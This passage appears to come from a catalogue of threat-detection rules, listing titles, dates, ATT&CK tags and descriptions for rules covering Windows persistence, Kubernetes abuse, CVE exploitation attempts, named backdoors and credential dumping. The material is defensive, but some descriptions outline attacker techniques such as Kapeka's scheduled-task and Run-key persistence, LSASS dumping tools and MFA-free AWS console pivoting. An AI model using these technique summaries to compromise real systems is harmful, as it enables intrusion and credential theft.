    Detects changes to the "Winlogon" registry key where a process sets the "Shell" value to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.

  • Potential Remote Command Execution In Pod Container

    Feb 3, 2025 · attack.t1609

    Detects attempts to execute remote commands within a Pod's container using e.g. the "kubectl exec" command.

  • Potential Sidecar Injection Into Running Deployment

    Feb 3, 2025 · attack.t1609

    Detects attempts to inject a sidecar container into a running deployment. A sidecar container is an additional container within a pod that resides alongside the main container. One way to add containers to running resources like Deployments/DaemonSets/StatefulSets is via a "kubectl patch" operation. By injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separate pod in the cluster.

  • Potentially Suspicious CMD Shell Output Redirect

    Feb 3, 2025 · attack.defense-evasion attack.t1218

    Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.

  • Privileged Container Deployed

    Feb 3, 2025 · attack.t1611

    Detects the creation of a "privileged" container, an action which could be indicative of a threat actor mounting a container breakout attack. A privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact with and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host. Various versions of "privileged" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields.

  • RBAC Permission Enumeration Attempt

    Feb 3, 2025 · attack.t1069.003 attack.t1087.004

    Detects identities attempting to enumerate their Kubernetes RBAC permissions. In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment. In a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a "kubectl auth can-i --list" command. This will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization.

  • Register New IFilter For Persistence

    Feb 3, 2025 · attack.persistence

    Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.

  • Registry Persistence via Service in Safe Mode

    Feb 3, 2025 · attack.defense-evasion attack.t1564.001

    Detects the modification of the registry to allow a driver or service to persist in Safe Mode.

  • Remote Access Tool - Team Viewer Session Started On Linux Host

    Feb 3, 2025 · attack.initial-access attack.t1133

    Detects the command line executed when TeamViewer starts a session initiated by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.

  • Remote Access Tool - Team Viewer Session Started On MacOS Host

    Feb 3, 2025 · attack.initial-access attack.t1133

    Detects the command line executed when TeamViewer starts a session initiated by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.

  • Remote Access Tool - Team Viewer Session Started On Windows Host

    Feb 3, 2025 · attack.initial-access attack.t1133

    Detects the command line executed when TeamViewer starts a session initiated by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.

  • Renamed NirCmd.EXE Execution

    Feb 3, 2025 · attack.execution attack.t1059 attack.defense-evasion attack.t1202

    Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.

  • Rundll32 Execution With Uncommon DLL Extension

    Feb 3, 2025 · attack.defense-evasion attack.t1218.011

    Detects the execution of rundll32 with a command line that doesn't contain a common DLL extension.

  • ServiceDll Hijack

    Feb 3, 2025 · attack.persistence attack.privilege-escalation attack.t1543.003

    Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.

  • Suspicious Command Patterns In Scheduled Task Creation

    Feb 3, 2025 · attack.execution attack.t1053.005

    Detects scheduled task creation via "schtasks" where the task contains potentially suspicious or uncommon commands.

  • Suspicious Network Connection to IP Lookup Service APIs

    Feb 3, 2025 · attack.discovery attack.t1016

    Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of post-compromise internet connectivity test activity.

  • Suspicious Response File Execution Via Odbcconf.EXE

    Feb 3, 2025 · attack.defense-evasion attack.t1218.008

    Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.

  • Sysmon Driver Altitude Change

    Feb 3, 2025 · attack.defense-evasion attack.t1562.001

    Detects changes in Sysmon driver altitude value. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.

  • Windows Defender Service Disabled - Registry

    Feb 3, 2025 · attack.defense-evasion attack.t1562.001

    Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry.

  • WCE wceaux.dll Access

    Jan 31, 2025 · attack.credential-access attack.t1003 attack.s0005

    Detects access to wceaux.dll during WCE pass-the-hash remote command execution on the source host.

  • CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21

    Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-1389 detection.emerging-threats

    Detects a potential exploitation attempt of CVE-2023-1389, an unauthenticated command injection in TP-Link Archer AX21.

  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)

    Jan 30, 2025 · attack.execution attack.t1059 attack.initial-access attack.t1190 cve.2023-22518 detection.emerging-threats

    Detects an exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to, e.g., create admin accounts and execute arbitrary commands.

  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)

    Jan 30, 2025 · attack.execution attack.t1059 attack.initial-access attack.t1190 cve.2023-22518 detection.emerging-threats

    Detects an exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to, e.g., create admin accounts and execute arbitrary commands.

  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy)

    Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-22518 detection.emerging-threats

    Detects an exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to, e.g., create admin accounts and execute arbitrary commands.

  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver)

    Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-22518 detection.emerging-threats

    Detects an exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to, e.g., create admin accounts and execute arbitrary commands.

  • CVE-2023-46747 Exploitation Activity - Proxy

    Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-46747 detection.emerging-threats

    Detects exploitation activity of CVE-2023-46747, an unauthenticated remote code execution vulnerability in F5 BIG-IP.

  • CVE-2023-46747 Exploitation Activity - Webserver

    Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-46747 detection.emerging-threats

    Detects exploitation activity of CVE-2023-46747, an unauthenticated remote code execution vulnerability in F5 BIG-IP.

  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy

    Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-4966 detection.emerging-threats

    Detects an exploitation attempt of CVE-2023-4966, a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability, via proxy logs by looking for a very long Host header string.

  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver

    Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-4966 detection.emerging-threats

    Detects an exploitation attempt of CVE-2023-4966, a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability, via webserver logs by looking for a very long Host header string.

  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy

    Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-4966 detection.emerging-threats

    Detects a potential exploitation attempt of CVE-2023-4966, a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability, via proxy logs.

  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver

    Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-4966 detection.emerging-threats

    Detects a potential exploitation attempt of CVE-2023-4966, a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability, via webserver logs.

  • CVE-2024-1708 - ScreenConnect Path Traversal Exploitation

    Jan 30, 2025 · attack.persistence cve.2024-1708 detection.emerging-threats

    This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.

  • CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security

    Jan 30, 2025 · attack.initial-access attack.persistence cve.2024-1708 detection.emerging-threats

    This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. This requires an Advanced Auditing policy that logs successful Windows Event ID 4663 events, with a SACL set on the directory.

  • CVE-2024-1709 - ScreenConnect Authentication Bypass Exploitation

    Jan 30, 2025 · attack.initial-access attack.persistence cve.2024-1709 detection.emerging-threats

    Detects GET requests to '/SetupWizard.aspx/[anythinghere]' that indicate exploitation of the ScreenConnect vulnerability CVE-2024-1709.

  • CVE-2024-50623 Exploitation Attempt - Cleo

    Jan 30, 2025 · attack.execution attack.t1190 cve.2024-50623 detection.emerging-threats

    Detects an exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawned from the Cleo software suite with a suspicious PowerShell command line.

  • Exploitation Attempt Of CVE-2023-46214 Using Public POC Code

    Jan 30, 2025 · attack.lateral-movement attack.t1210 cve.2023-46214 detection.emerging-threats

    Detects an exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing, using known public proof of concept code.

  • File Creation Related To RAT Clients

    Jan 30, 2025 · attack.execution detection.emerging-threats

    Detects the creation of ".conf" files related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.

  • Forest Blizzard APT - File Creation Activity

    Jan 30, 2025 · attack.defense-evasion attack.t1562.002 detection.emerging-threats

    Detects the creation of specific files inside of ProgramData directory. These files were seen being created by Forest Blizzard as described by MSFT.

  • Forest Blizzard APT - Process Creation Activity

    Jan 30, 2025 · attack.defense-evasion attack.execution detection.emerging-threats

    Detects the execution of specific process and command line combinations. These were seen being created by Forest Blizzard as described by MSFT.

  • Kapeka Backdoor Autorun Persistence

    Jan 30, 2025 · attack.persistence attack.t1547.001 detection.emerging-threats

    Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence.

  • Kapeka Backdoor Configuration Persistence

    Jan 30, 2025 · attack.persistence attack.defense-evasion attack.t1553.003 detection.emerging-threats

    Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers" registry key. The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.

  • Kapeka Backdoor Execution Via RunDLL32.EXE

    Jan 30, 2025 · attack.defense-evasion attack.t1218.011 detection.emerging-threats

    Detects the Kapeka backdoor process execution pattern, where the dropper launches the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument.

  • Kapeka Backdoor Loaded Via Rundll32.EXE

    Jan 30, 2025 · attack.execution attack.t1204.002 attack.defense-evasion attack.t1218.011 detection.emerging-threats

    Detects the Kapeka Backdoor binary being loaded by rundll32.exe. The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.

  • Kapeka Backdoor Persistence Activity

    Jan 30, 2025 · attack.persistence attack.t1053.005 detection.emerging-threats

    Detects Kapeka backdoor persistence activity. Depending on the process privileges, the Kapeka dropper sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or as an autorun registry entry (if not). For the scheduled task, it creates a scheduled task called "Sens Api" via the schtasks command, which is set to run upon system startup as SYSTEM. To establish persistence through autorun, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command. Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.

  • Kapeka Backdoor Scheduled Task Creation

    Jan 30, 2025 · attack.execution attack.privilege-escalation attack.persistence attack.t1053.005 detection.emerging-threats

    Detects Kapeka backdoor scheduled task creation based on attributes such as paths, command line flags, etc.

  • Lummac Stealer Activity - Execution Of More.com And Vbc.exe

    Jan 30, 2025 · attack.defense-evasion attack.t1055 detection.emerging-threats

    Detects the execution of more.com and vbc.exe in the process tree. This behavior was observed by a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process.

  • MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request

    Jan 30, 2025 · attack.persistence attack.t1505.003 cve.2023-34362 detection.emerging-threats

    Detects GET requests to specific files used during the exploitation of MOVEit CVE-2023-34362.

  • OWASSRF Exploitation Attempt Using Public POC - Proxy

    Jan 30, 2025 · attack.initial-access attack.t1190 detection.emerging-threats

    Detects an exploitation attempt of the OWASSRF variant targeting Exchange servers using a publicly available POC. It uses the OWA endpoint to access the PowerShell backend endpoint.

  • Pikabot Fake DLL Extension Execution Via Rundll32.EXE

    Jan 30, 2025 · attack.defense-evasion attack.execution detection.emerging-threats

    Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.

  • Potential BlackByte Ransomware Activity

    Jan 30, 2025 · attack.execution attack.defense-evasion attack.impact attack.t1485 attack.t1498 attack.t1059.001 attack.t1140 detection.emerging-threats

    Detects command line patterns used by BlackByte ransomware in different operations.

  • Potential CSharp Streamer RAT Loading .NET Executable Image

    Jan 30, 2025 · attack.command-and-control attack.t1219 detection.emerging-threats

    Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool.

  • Potential CVE-2023-27997 Exploitation Indicators

    Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-27997 detection.emerging-threats

    Detects indicators of potential exploitation of CVE-2023-27997 in Fortigate web logs. To avoid false positives it is best to look for successive requests to the endpoints mentioned as well as unusual values of the "enc" parameter.

  • Potential Exploitation Attempt Of Undocumented WindowsServer RCE

    Jan 30, 2025 · attack.initial-access attack.t1190 detection.emerging-threats

    Detects a potential exploitation attempt of an undocumented Windows Server pre-auth Remote Code Execution (RCE).

  • Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process

    Jan 30, 2025 · attack.execution cve.2024-3094 detection.emerging-threats

    Detects a potentially suspicious child process of the SSH daemon (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.

  • Potential Kapeka Decrypted Backdoor Indicator

    Jan 30, 2025 · attack.defense-evasion detection.emerging-threats

    Detects the presence of a file that is the decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges. The file name is typically 5-6 characters long, a random combination of consonants and vowels, followed by a ".wll" extension to pose as a legitimate file and evade detection.

  • Potential OWASSRF Exploitation Attempt - Proxy

    Jan 30, 2025 · attack.initial-access attack.t1190 detection.emerging-threats

    Detects an exploitation attempt of the OWASSRF variant targeting Exchange servers. It uses the OWA endpoint to access the PowerShell backend endpoint.

  • Potential Raspberry Robin CPL Execution Activity

    Jan 30, 2025 · attack.defense-evasion attack.execution attack.t1218.011 detection.emerging-threats

    Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. This behavior was observed in multiple Raspberry-Robin variants.

  • Potential Raspberry Robin Registry Set Internet Settings ZoneMap

    Jan 30, 2025 · attack.t1112 attack.defense-evasion detection.emerging-threats

    Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024. Raspberry Robin may alter proxy settings to circumvent security measures, ensuring an unhindered connection to its Command and Control servers, and thus continued control over compromised systems, where existing proxy settings would block such connections.

  • Qakbot Uninstaller Execution

    Jan 30, 2025 · attack.execution detection.emerging-threats

    Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet.

  • Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor

    Jan 30, 2025 · attack.persistence detection.emerging-threats

    Hunts for known SVR-specific scheduled task names.

  • Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler

    Jan 30, 2025 · attack.persistence detection.emerging-threats

    Hunts for known SVR-specific scheduled task names.

  • ScreenConnect - SlashAndGrab Exploitation Indicators

    Jan 30, 2025 · attack.defense-evasion detection.emerging-threats

    Detects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect, as reported by Team Huntress.

  • ScreenConnect User Database Modification

    Jan 30, 2025 · attack.persistence cve.2024-1709 detection.emerging-threats

    Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.

  • ScreenConnect User Database Modification - Security

    Jan 30, 2025 · attack.defense-evasion cve.2024-1709 detection.emerging-threats

    This detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions. This requires an Advanced Auditing policy that logs successful Windows Event ID 4663 events, with a SACL set on the directory.

  • Suspicious Computer Account Name Change CVE-2021-42287

    Jan 30, 2025 · attack.defense-evasion attack.persistence attack.t1036 attack.t1098 cve.2021-42287 detection.emerging-threats

    Detects the renaming of an existing computer account to an account name that doesn't contain a $ symbol, as seen in attacks against CVE-2021-42287.

  • Suspicious Set Value of MSDT in Registry (CVE-2022-30190)

    Jan 30, 2025 · attack.defense-evasion attack.t1221 detection.emerging-threats

    Detects the setting of the "ms-msdt" MSProtocol URI scheme value in the registry, which could be an attempt to exploit CVE-2022-30190.

  • Failed Code Integrity Checks

    Jan 30, 2025 · attack.defense-evasion attack.t1027.001

    Detects code integrity failures such as missing page hashes or corrupted drivers due to unauthorized modification. This could be a sign of tampered binaries.

  • Renamed Powershell Under Powershell Channel

    Jan 30, 2025 · attack.execution attack.t1059.001 attack.t1036.003

    Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.

  • Suspicious Binaries and Scripts in Public Folder

    Jan 30, 2025 · attack.execution attack.t1204

    Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.

  • Using explorer.exe to open a file explorer folder via command prompt

    Jan 29, 2025 · attack.discovery attack.t1135

    Detects the initial execution of cmd.exe which spawns explorer.exe with the appropriate command line arguments for opening the My Computer folder.

  • Privileged User Has Been Created

    Jan 22, 2025 · attack.persistence attack.t1136.001 attack.t1098

    Detects the addition of a new user to a privileged group such as "root" or "sudo".

  • HackTool - Dumpert Process Dumper Execution

    Jan 22, 2025 · attack.credential-access attack.t1003.001

    Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory.

  • ManageEngine Endpoint Central Dctask64.EXE Potential Abuse

    Jan 22, 2025 · attack.defense-evasion attack.t1055.001

    Detects the execution of "dctask64.exe", a binary signed by ZOHO Corporation and part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.

  • Renamed ZOHO Dctask64 Execution

    Jan 22, 2025 · attack.defense-evasion attack.t1036 attack.t1055.001 attack.t1202 attack.t1218

    Detects a renamed "dctask64.exe" execution, a binary signed by ZOHO Corporation and part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.

  • Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load

    Jan 19, 2025 · attack.defense-evasion attack.impact attack.t1490

    Detects the image load of the VSS DLL by uncommon executables.

  • Azure Login Bypassing Conditional Access Policies

    Jan 19, 2025 · attack.defense-evasion attack.t1078

    Detects a successful login to the Microsoft Intune Company Portal which could allow bypassing Conditional Access Policies and Intune device trust using a tool like TokenSmith.

  • Shell Execution via Rsync - Linux

    Jan 19, 2025 · attack.execution attack.t1059

    Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

  • Suspicious Invocation of Shell via Rsync

    Jan 19, 2025 · attack.execution attack.t1059 attack.t1203

    Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.

  • Exploit Framework User Agent

    Jan 19, 2025 · attack.command-and-control attack.t1071.001

    Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs.

  • Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation

    Jan 15, 2025 · attack.execution cve.2023-36874 detection.emerging-threats

    Detects a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.

  • CVE-2024-49113 Exploitation Attempt - LDAP Nightmare

    Jan 8, 2025 · attack.impact attack.t1499 cve.2024-49113 detection.emerging-threats

    Detects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on "Application Error" log where the faulting application is "lsass.exe" and the faulting module is "WLDAP32.dll".

  • Active Directory Certificate Services Denied Certificate Enrollment Request

    Jan 6, 2025 · attack.credential-access attack.t1553.004

    Detects denied requests by Active Directory Certificate Services. Examples of such denials include issues with permissions on the certificate template or invalid signatures.

  • AWS Console GetSigninToken Potential Abuse

    calendar Jan 6, 2025 · attack.lateral-movement attack.t1021.007 attack.t1550.001  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious events involving "GetSigninToken". An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.


    Read More
  • Bitbucket Audit Log Configuration Updated

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the bitbucket audit log configuration.


    Read More
  • Bitbucket Full Data Export Triggered

    calendar Jan 6, 2025 · attack.collection attack.t1213.003  ·
    Share on: twitter facebook linkedin copy

    Detects when full data export is attempted.


    Read More
  • Bitbucket Global Permission Changed

    calendar Jan 6, 2025 · attack.persistence attack.privilege-escalation attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Detects global permissions change activity.


    Read More
  • Bitbucket Global Secret Scanning Rule Deleted

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects Bitbucket global secret scanning rule deletion activity.


    Read More
  • Bitbucket Global SSH Settings Changed

    calendar Jan 6, 2025 · attack.lateral-movement attack.defense-evasion attack.t1562.001 attack.t1021.004  ·
    Share on: twitter facebook linkedin copy

    Detects Bitbucket global SSH access configuration changes.


    Read More
  • Bitbucket Project Secret Scanning Allowlist Added

    calendar Jan 6, 2025 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects when a secret scanning allowlist rule is added for projects.


    Read More
  • Bitbucket Secret Scanning Exempt Repository Added

    Jan 6, 2025 · attack.defense-evasion attack.t1562.001

    Detects when a repository is exempted from the secret scanning feature.

  • Bitbucket Secret Scanning Rule Deleted

    Jan 6, 2025 · attack.defense-evasion attack.t1562.001

    Detects when a secret scanning rule is deleted for a project or repository.

  • Bitbucket Unauthorized Access To A Resource

    Jan 6, 2025 · attack.resource-development attack.t1586

    Detects unauthorized access attempts to a resource.

  • Bitbucket Unauthorized Full Data Export Triggered

    Jan 6, 2025 · attack.collection attack.resource-development attack.t1213.003 attack.t1586

    Detects when a full data export is attempted by an unauthorized user.

  • Bitbucket User Details Export Attempt Detected

    Jan 6, 2025 · attack.collection attack.reconnaissance attack.discovery attack.t1213 attack.t1082 attack.t1591.004

    Detects user data export activity.

  • Bitbucket User Login Failure

    Jan 6, 2025 · attack.defense-evasion attack.credential-access attack.t1078.004 attack.t1110

    Detects user authentication failure events. Please note that this rule can be noisy, and it is recommended to use it with correlation based on the "author.name" field.

  • Bitbucket User Login Failure Via SSH

    Jan 6, 2025 · attack.t1021.004 attack.t1110

    Detects SSH user login access failures. Please note that this rule can be noisy, and it is recommended to use it with correlation based on the "author.name" field.

  • Console CodePage Lookup Via CHCP

    Jan 6, 2025 · attack.discovery attack.t1614.001

    Detects use of chcp to look up the system locale value as part of host discovery.

  • Diskshadow Script Mode - Uncommon Script Extension Execution

    Jan 6, 2025 · attack.defense-evasion attack.t1218

    Detects execution of "Diskshadow.exe" in script mode to execute a script with a potentially uncommon extension. Initial baselining of the allowed extension list is required.

  • DNS Query Request To OneLaunch Update Service

    Jan 6, 2025 · attack.collection attack.t1056

    Detects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application. When the OneLaunch application is installed, it will attempt to get updates from this domain.

  • DPRK Threat Actor - C2 Communication DNS Indicators

    Jan 6, 2025 · attack.command-and-control detection.emerging-threats

    Detects DNS queries for C2 domains used by DPRK threat actors.

  • Enumerate All Information With Whoami.EXE

    Jan 6, 2025 · attack.discovery attack.t1033 car.2016-03-001

    Detects the execution of "whoami.exe" with the "/all" flag.

  • Exploitation Indicator Of CVE-2022-42475

    Jan 6, 2025 · attack.initial-access cve.2022-42475 detection.emerging-threats

    Detects exploitation indicators of CVE-2022-42475, a heap-based buffer overflow in sslvpnd.

  • File In Suspicious Location Encoded To Base64 Via Certutil.EXE

    Jan 6, 2025 · attack.defense-evasion attack.t1027

    Detects the execution of certutil with the "encode" flag to encode a file to base64 where the file is located in a potentially suspicious location.

  • Github Push Protection Bypass Detected

    Jan 6, 2025 · attack.defense-evasion attack.t1562.001

    Detects when a user bypasses the push protection on a secret detected by secret scanning.

  • Github Push Protection Disabled

    Jan 6, 2025 · attack.defense-evasion attack.t1562.001

    Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules.

  • HackTool - Evil-WinRm Execution - PowerShell Module

    Jan 6, 2025 · attack.lateral-movement

    Detects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility.

  • Insensitive Subfolder Search Via Findstr.EXE

    Jan 6, 2025 · attack.defense-evasion attack.t1218 attack.t1564.004 attack.t1552.001 attack.t1105

    Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or to filter the results of commands.

  • Interesting Service Enumeration Via Sc.EXE

    Jan 6, 2025 · attack.t1003

    Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.

  • No Suitable Encryption Key Found For Generating Kerberos Ticket

    Jan 6, 2025 · attack.credential-access attack.t1558.003

    Detects errors when a target server doesn't have suitable keys for generating Kerberos tickets. This issue can occur, for example, when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7, which has DES encryption for Kerberos authentication disabled.

  • Port Forwarding Activity Via SSH.EXE

    Jan 6, 2025 · attack.command-and-control attack.lateral-movement attack.t1572 attack.t1021.001 attack.t1021.004

    Detects port forwarding activity via SSH.exe.

  • Potential Credential Dumping Activity Via LSASS

    Jan 6, 2025 · attack.credential-access attack.t1003.001 attack.s0002

    Detects process access requests to the LSASS process with specific call trace calls and access masks. This behaviour is exhibited by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.

  • Potential SentinelOne Shell Context Menu Scan Command Tampering

    Jan 6, 2025 · attack.persistence

    Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.

  • Potentially Suspicious Ping/Copy Command Combination

    Jan 6, 2025 · attack.defense-evasion attack.t1070.004

    Detects an uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.

  • Qakbot Regsvr32 Calc Pattern

    Jan 6, 2025 · attack.defense-evasion attack.execution detection.emerging-threats

    Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot.

  • Rebuild Performance Counter Values Via Lodctr.EXE

    Jan 6, 2025 · attack.execution

    Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite the performance counter configuration in order to confuse and evade monitoring and security solutions.

  • Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate

    Jan 6, 2025 · attack.execution attack.initial-access

    Detects the execution of an AnyDesk binary with a version prior to 8.0.8. Prior to version 8.0.8, the AnyDesk application used a signing certificate that got compromised by threat actors. Use this rule to detect instances of older versions of AnyDesk using the compromised certificate. This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.

  • Remote Access Tool - ScreenConnect Remote Command Execution

    Jan 6, 2025 · attack.execution attack.t1059.003

    Detects the execution of a system command via the ScreenConnect RMM service.

  • Remote Access Tool - ScreenConnect Server Web Shell Execution

    Jan 6, 2025 · attack.initial-access attack.t1190

    Detects potential web shell execution from the ScreenConnect server process.

  • Remote Access Tool - Simple Help Execution

    Jan 6, 2025 · attack.command-and-control attack.t1219

    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

  • Remote File Download Via Findstr.EXE

    Jan 6, 2025 · attack.defense-evasion attack.t1218 attack.t1564.004 attack.t1552.001 attack.t1105

    Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share, as described in the LOLBAS entry.

  • Response File Execution Via Odbcconf.EXE

    Jan 6, 2025 · attack.defense-evasion attack.t1218.008

